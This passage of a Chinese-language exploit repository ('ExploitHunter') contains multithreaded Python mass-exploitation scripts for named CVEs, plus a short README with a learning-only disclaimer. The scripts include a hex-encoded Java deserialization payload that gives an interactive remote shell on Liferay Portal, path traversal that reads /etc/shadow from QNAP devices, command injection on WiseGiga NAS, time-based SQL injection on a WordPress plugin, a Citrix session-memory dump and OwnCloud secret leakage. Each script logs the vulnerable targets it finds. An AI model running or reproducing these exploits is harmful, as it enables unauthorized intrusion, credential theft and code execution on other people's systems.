26F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78'
18 | post_data = (
19 | 'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
20 | )
21 | headers = {
22 | 'Content-Type': 'application/x-www-form-urlencoded',
23 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
24 | "jk": cmd
25 | }
26 | api_url = '{url}/api/jsonws/invoke'.format(url=url)
27 | resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
28 | pattern = '~~~(.*?)~~~'
29 | match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
30 | if match:
31 | result = match.group(1)
32 | result = result.strip()
33 | with open(success_file, 'a') as s_file:
34 | s_file.write(f"++++++++++++++++++\n")
35 | s_file.write(f"目标URL: {url}\n")
36 | s_file.write(f"Payload: {cmd}\n")
37 | s_file.write(f"响应内容:\n{result}\n\n")
38 |
39 | if interactive:
40 | print(f"目标URL: {url}")
41 | print(f"Payload: {cmd}")
42 | print(f"响应内容:\n{result}\n")
43 | while True:
44 | user_input = input("请输入要执行的命令或输入'exit'退出: ")
45 | if user_input == 'exit':
46 | break
47 | interactive_cmd = user_input.strip()
48 | interactive_result = check_for_vulnerability(url, interactive_cmd, False, proxies, success_file)
49 | if interactive_result:
50 | print(f"响应内容:\n{interactive_result}\n")
51 |
52 | return result # 返回结果字符串
53 | except Exception as e:
54 | print(f"发生异常:{e}")
55 | return None
56 |
57 | def scan_targets(targets, cmd, interactive=False, proxies={}, success_file=None):
58 | for target in targets:
59 | target = target.strip()
60 | check_for_vulnerability(target, cmd, interactive, proxies, success_file)
61 |
62 | if __name__ == '__main__':
63 | parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞CVE-2020-7961")
64 | parser.add_argument("-u", "--url", help="目标URL")
65 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
66 | parser.add_argument("-c", "--cmd", help="要执行的命令")
67 | parser.add_argument("-i", "--interactive", action="store_true", help="启用交互式Shell模式")
68 | args = parser.parse_args()
69 |
70 | if not args.url and not args.file:
71 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
72 | exit(1)
73 |
74 | if args.url:
75 | urls = [args.url]
76 | elif args.file:
77 | with open(args.file, 'r') as file:
78 | urls = file.readlines()
79 |
80 | proxies = {}
81 | success_file = 'success_targets.txt'
82 |
83 | for url in urls:
84 | url = url.strip()
85 | if not url.startswith("http://") and not url.startswith("https://"):
86 | scan_targets(["http://" + url, "https://" + url], args.cmd, args.interactive, proxies, success_file)
87 | else:
88 | scan_targets([url], args.cmd, args.interactive, proxies, success_file)
89 |
90 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
91 |
--------------------------------------------------------------------------------
/OwnCloud_CVE-2023-49105_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-12-05
3 | import requests
4 | import argparse
5 | import threading
6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
7 |
8 | def check_phpinfo(url, success_file=None):
9 | try:
10 | response = requests.get(url, verify=False) # Bypass SSL verification
11 | if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
12 | return response.text
13 | except Exception as e:
14 | pass
15 | return False
16 |
17 | def check_for_vulnerability(url, proxies=None, success_file=None):
18 | try:
19 | url_variant1 = url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
20 | url_variant2 = url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
21 |
22 | response_text = check_phpinfo(url_variant1) or check_phpinfo(url_variant2)
23 | if response_text:
24 | print(f"目标URL: {url} ")
25 | with open(success_file, 'a') as s_file:
26 | s_file.write(f"++++++++++++++++++\n")
27 | s_file.write(f"目标URL: {url}\n")
28 | s_file.write(f"响应内容: {response_text}\n\n")
29 | return True
30 | else:
31 | return False
32 | except Exception as e:
33 | print(f"发生异常:{e}")
34 | return False
35 |
36 | def scan_targets(targets, proxies=None, success_file=None):
37 | for target in targets:
38 | target = target.strip()
39 | check_for_vulnerability(target, proxies, success_file)
40 |
41 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
42 | threads = []
43 |
44 | for i in range(num_threads):
45 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
46 | threads.append(thread)
47 |
48 | for thread in threads:
49 | thread.start()
50 |
51 | for thread in threads:
52 | thread.join()
53 |
54 | if __name__ == '__main__':
55 | parser = argparse.ArgumentParser(description="OwnCloud 敏感信息泄漏漏洞CVE-2023-49103")
56 | parser.add_argument("-u", "--url", help="目标URL")
57 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
58 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
59 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
60 | args = parser.parse_args()
61 |
62 | if not args.url and not args.file:
63 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
64 | exit(1)
65 |
66 | if args.url:
67 | urls = [args.url]
68 | elif args.file:
69 | with open(args.file, 'r') as file:
70 | urls = file.readlines()
71 |
72 | success_file = 'success_targets.txt'
73 |
74 | proxies = {
75 | "http": args.proxy,
76 | "https": args.proxy
77 | } if args.proxy else None
78 |
79 | multi_threaded_scan(urls, proxies, success_file, args.threads)
80 |
81 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
82 |
--------------------------------------------------------------------------------
/QNAP-NAS_CVE-2024-21889_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2024-03-20
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import httplib2
8 | import random
9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 |
13 | def check_for_vulnerability(url, proxies=None, success_file=None):
14 | data="wiz_func=start_2sv&action=none&user=guest&pwd=none"
15 |
16 | headers = {'User-Agent': 'curl/8.6.0', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
17 |
18 | try:
19 | response = requests.post(url+"/cgi-bin/priv/privWizard.cgi",data=data,verify=False, timeout=5,headers=headers)
20 | if response.status_code==200 and "" in response.text:
21 | print(f"目标URL: {url}")
22 | with open(success_file, 'a') as s_file:
23 | s_file.write(f"++++++++++++++++++\n")
24 | s_file.write(f"目标URL: {url}\n")
25 | s_file.write(f"响应内容: {response.text}\n\n")
26 | return True
27 | except Exception as e:
28 | print(f"发生异常:{e}")
29 | return False
30 |
31 | def scan_targets(targets, proxies=None, success_file=None):
32 | for target in targets:
33 | target = target.strip()
34 | check_for_vulnerability(target, proxies, success_file)
35 |
36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
37 | threads = []
38 |
39 | for i in range(num_threads):
40 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
41 | threads.append(thread)
42 |
43 | for thread in threads:
44 | thread.start()
45 |
46 | for thread in threads:
47 | thread.join()
48 |
49 | if __name__ == '__main__':
50 | parser = argparse.ArgumentParser(description="QNAP NAS身份验证缺失漏洞CVE-2024-21899")
51 | parser.add_argument("-u", "--url", help="目标URL")
52 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
53 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
54 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
55 | args = parser.parse_args()
56 |
57 | if not args.url and not args.file:
58 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
59 | exit(1)
60 |
61 | if args.url:
62 | urls = [args.url]
63 | elif args.file:
64 | with open(args.file, 'r') as file:
65 | urls = file.readlines()
66 |
67 | success_file = 'success_targets.txt'
68 |
69 | proxies = {
70 | "http": args.proxy,
71 | "https": args.proxy
72 | } if args.proxy else None
73 |
74 | multi_threaded_scan(urls, proxies, success_file, args.threads)
75 |
76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
77 |
--------------------------------------------------------------------------------
/QNAP_CVE-2019-7192_Exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-12-22
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import re
8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
9 |
10 | def check_for_vulnerability(url, proxies=None, success_file=None):
11 | try:
12 | headers = {
13 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
14 | "Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8",
15 | "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
16 | "Accept-Encoding":"gzip, deflate",
17 | "Connection":"close",
18 | "Upgrade-Insecure-Requests":"1",
19 | "Pragma":"no-cache",
20 | "Cache-Control":"no-cache",
21 | "Content-Type":"application/x-www-form-urlencoded"
22 | }
23 |
24 | req = requests.Session()
25 |
26 | # search album_id
27 |
28 | print("="*65)
29 | post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
30 | album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
31 |
32 | if album_id_response.status_code != 200:
33 | print("album id not found \n\033[91mnot vulnerable\033[0m")
34 | return False
35 |
36 | album_id = re.search('(?<=)', album_id_response.text).group()
37 |
38 | # search $_SESSION['access_code']
39 |
40 | access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
41 | if access_code_response.status_code != 200:
42 | print("slideshow not found \n\033[91mnot vulnerable\033[0m")
43 | return False
44 |
45 | access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
46 |
47 | def get_file_content(file):
48 | post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
49 | file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
50 | print(f"目标URL: {url}, 响应内容: {file_read_response.text}")
51 | with open(success_file, 'a') as s_file:
52 | s_file.write("=" * 65 + "\n")
53 | s_file.write(f"目标URL: {url}\n")
54 | s_file.write(f"响应内容: {file_read_response.text}\n\n")
55 |
56 | # get_file_content('./../../../../../etc/hostname')
57 | get_file_content('./../../../../../etc/shadow')
58 |
59 | except Exception as e:
60 | print(f"发生异常:{e}")
61 | return False
62 |
63 | def scan_targets(targets, proxies=None, success_file=None):
64 | for target in targets:
65 | target = target.strip()
66 | check_for_vulnerability(target, proxies, success_file)
67 |
68 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
69 | threads = []
70 |
71 | for i in range(num_threads):
72 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
73 | threads.append(thread)
74 |
75 | for thread in threads:
76 | thread.start()
77 |
78 | for thread in threads:
79 | thread.join()
80 |
81 | if __name__ == '__main__':
82 | parser = argparse.ArgumentParser(description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192")
83 | parser.add_argument("-u", "--url", help="目标URL")
84 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
85 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
86 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
87 | args = parser.parse_args()
88 |
89 | if not args.url and not args.file:
90 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
91 | exit(1)
92 |
93 | if args.url:
94 | urls = [args.url]
95 | elif args.file:
96 | with open(args.file, 'r') as file:
97 | urls = file.readlines()
98 |
99 | success_file = 'success_targets.txt'
100 |
101 | proxies = {
102 | "http": args.proxy,
103 | "https": args.proxy
104 | } if args.proxy else None
105 |
106 | multi_threaded_scan(urls, proxies, success_file, args.threads)
107 |
108 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
109 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ExploitHunter
2 | **【免责声明】**
3 |
4 | 本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。
5 |
6 | **【最近更新】**
7 |
8 |
9 | - 2024-03-20
10 | - QNAP NAS身份验证缺失漏洞CVE-2024-21899
11 |
12 | - 2024-01-22
13 | - Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527
14 |
15 | - 2023.12.30
16 | - Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467
17 |
18 | - 2023.12.04
19 | - Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/WiseGigaNAS_rce_exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-11-17
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import httplib2
8 | import random
9 | import re
10 | import string
11 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
12 |
13 | def check_for_vulnerability(url, proxies=None, success_file=None):
14 | try:
15 | headers = {
16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
17 | }
18 | paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt']
19 |
20 | for path in paths:
21 | target_url = url + path
22 | response = requests.get(target_url, headers=headers, timeout=10, verify=False)
23 |
24 | if response.status_code == 200 and "window.open" in response.text:
25 | response2 = requests.get(url + paths[1], headers=headers, timeout=10, verify=False)
26 | if response2.status_code == 200 and "uid=" in response2.text:
27 | print(f"目标URL: {url}")
28 | with open(success_file, 'a') as s_file:
29 | s_file.write(f"++++++++++++++++++\n")
30 | s_file.write(f"目标URL: {url}\n")
31 | s_file.write(f"响应内容: {response2.text}\n\n")
32 | return True
33 |
34 | except Exception as e:
35 | print(f"发生异常:{e}")
36 |
37 | return False
38 |
39 | def scan_targets(targets, proxies=None, success_file=None):
40 | for target in targets:
41 | target = target.strip()
42 | check_for_vulnerability(target, proxies, success_file)
43 |
44 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
45 | threads = []
46 |
47 | for i in range(num_threads):
48 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
49 | threads.append(thread)
50 |
51 | for thread in threads:
52 | thread.start()
53 |
54 | for thread in threads:
55 | thread.join()
56 |
57 | if __name__ == '__main__':
58 | parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞")
59 | parser.add_argument("-u", "--url", help="目标URL")
60 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
61 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
62 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
63 | args = parser.parse_args()
64 |
65 | if not args.url and not args.file:
66 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
67 | exit(1)
68 |
69 | if args.url:
70 | urls = [args.url]
71 | elif args.file:
72 | with open(args.file, 'r') as file:
73 | urls = file.readlines()
74 |
75 | success_file = 'success_targets.txt'
76 |
77 | proxies = {
78 | "http": args.proxy,
79 | "https": args.proxy
80 | } if args.proxy else None
81 |
82 | multi_threaded_scan(urls, proxies, success_file, args.threads)
83 |
84 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
85 |
--------------------------------------------------------------------------------
/WordPress_plugin_SupportCandy_CVE-2023-1730_exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-11-16
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import time
8 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
9 |
10 | def check_for_vulnerability(url, proxies=None, success_file=None):
11 | try:
12 | headers = {'Cookie': 'wpsc_guest_login_auth={"email":"\' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}'}
13 |
14 | # 检查响应时间
15 | start_time = time.time()
16 | response = requests.get(url, headers=headers, proxies=proxies, verify=False)
17 | end_time = time.time()
18 | duration = end_time - start_time
19 |
20 | if response.status_code == 200 and "supportcandy" in response.text and duration >= 6:
21 | print(f"目标URL: {url}")
22 | with open(success_file, 'a') as s_file:
23 | s_file.write(f"++++++++++++++++++\n")
24 | s_file.write(f"目标URL: {url}\n")
25 | s_file.write(f"响应内容: 响应时间:{duration} 秒\n\n")
26 | return True
27 | except Exception as e:
28 | print(f"发生异常:{e}")
29 | return False
30 |
31 | def scan_targets(targets, proxies=None, success_file=None):
32 | for target in targets:
33 | target = target.strip()
34 | check_for_vulnerability(target, proxies, success_file)
35 |
36 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
37 | threads = []
38 |
39 | for i in range(num_threads):
40 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
41 | threads.append(thread)
42 |
43 | for thread in threads:
44 | thread.start()
45 |
46 | for thread in threads:
47 | thread.join()
48 |
49 | if __name__ == '__main__':
50 | parser = argparse.ArgumentParser(description="WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730")
51 | parser.add_argument("-u", "--url", help="目标URL")
52 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
53 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
54 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
55 | args = parser.parse_args()
56 |
57 | if not args.url and not args.file:
58 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
59 | exit(1)
60 |
61 | if args.url:
62 | urls = [args.url]
63 | elif args.file:
64 | with open(args.file, 'r') as file:
65 | urls = file.readlines()
66 |
67 | success_file = 'success_targets.txt'
68 |
69 | proxies = {
70 | "http": args.proxy,
71 | "https": args.proxy
72 | } if args.proxy else None
73 |
74 | multi_threaded_scan(urls, proxies, success_file, args.threads)
75 |
76 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
77 |
--------------------------------------------------------------------------------
/citrix_CVE-2023-4966_exploit.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-27
3 |
4 | import requests
5 | import argparse
6 | import threading
7 | import urllib3
8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
10 |
11 | def check_for_vulnerability(url, proxies=None, success_file=None):
12 | headers = {
13 | "Host": "a"*24576
14 | }
15 | try:
16 | response = requests.get(url + "/oauth/idp/.well-known/openid-configuration", headers=headers, proxies=proxies, verify=False, timeout=10)
17 | print(url + "/oauth/idp/.well-known/openid-configuration")
18 | print(response)
19 | if response.status_code == 200:
20 | with open(success_file, 'a') as s_file:
21 | s_file.write(f"++++++++++++++++++\n")
22 | s_file.write(f"目标URL: {url}\n")
23 | s_file.write(f"Payload: Dumped Memory\n")
24 | s_file.write(f"响应内容:\n{response.text[131050:]}\n\n")
25 | return True
26 | except Exception as e:
27 | print(f"发生异常:{e}")
28 | return False
29 |
30 | def scan_targets(targets, proxies=None, success_file=None):
31 | for target in targets:
32 | target = target.strip()
33 | check_for_vulnerability(target, proxies, success_file)
34 |
35 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
36 | threads = []
37 |
38 | for i in range(num_threads):
39 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
40 | threads.append(thread)
41 |
42 | for thread in threads:
43 | thread.start()
44 |
45 | for thread in threads:
46 | thread.join()
47 |
48 | if __name__ == '__main__':
49 | parser = argparse.ArgumentParser(description="Citrix NetScaler ADC & Gateway信息泄露漏洞 CVE-2023-4966")
50 | parser.add_argument("-u", "--url", help="目标URL")
51 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
52 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
53 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
54 | args = parser.parse_args()
55 |
56 | if not args.url and not args.file:
57 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
58 | exit(1)
59 |
60 | if args.url:
61 | urls = [args.url]
62 | elif args.file:
63 | with open(args.file, 'r') as file:
64 | urls = file.readlines()
65 |
66 | success_file = 'success_targets.txt'
67 |
68 | proxies = {
69 | "http": args.proxy,
70 | "https": args.proxy
71 | } if args.proxy else None
72 |
73 | multi_threaded_scan(urls, proxies, success_file, args.threads)
74 |
75 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
76 |
--------------------------------------------------------------------------------
/f5_CVE-2023-46747_exploit.py:
--------------------------------------------------------------------------------
1 | (抱歉,脚本存在问题,无法正常使用,所以先删了!仅作学习)
2 |
--------------------------------------------------------------------------------
/juniper-cve-2023-36845.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-9-22
3 |
4 | import requests
5 | import argparse
6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
7 |
8 | def check_for_vulnerability(url, proxies={}, success_file=None):
9 | headers = {
10 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
11 | }
12 | payload = 'auto_prepend_file="/etc/passwd"'
13 | try:
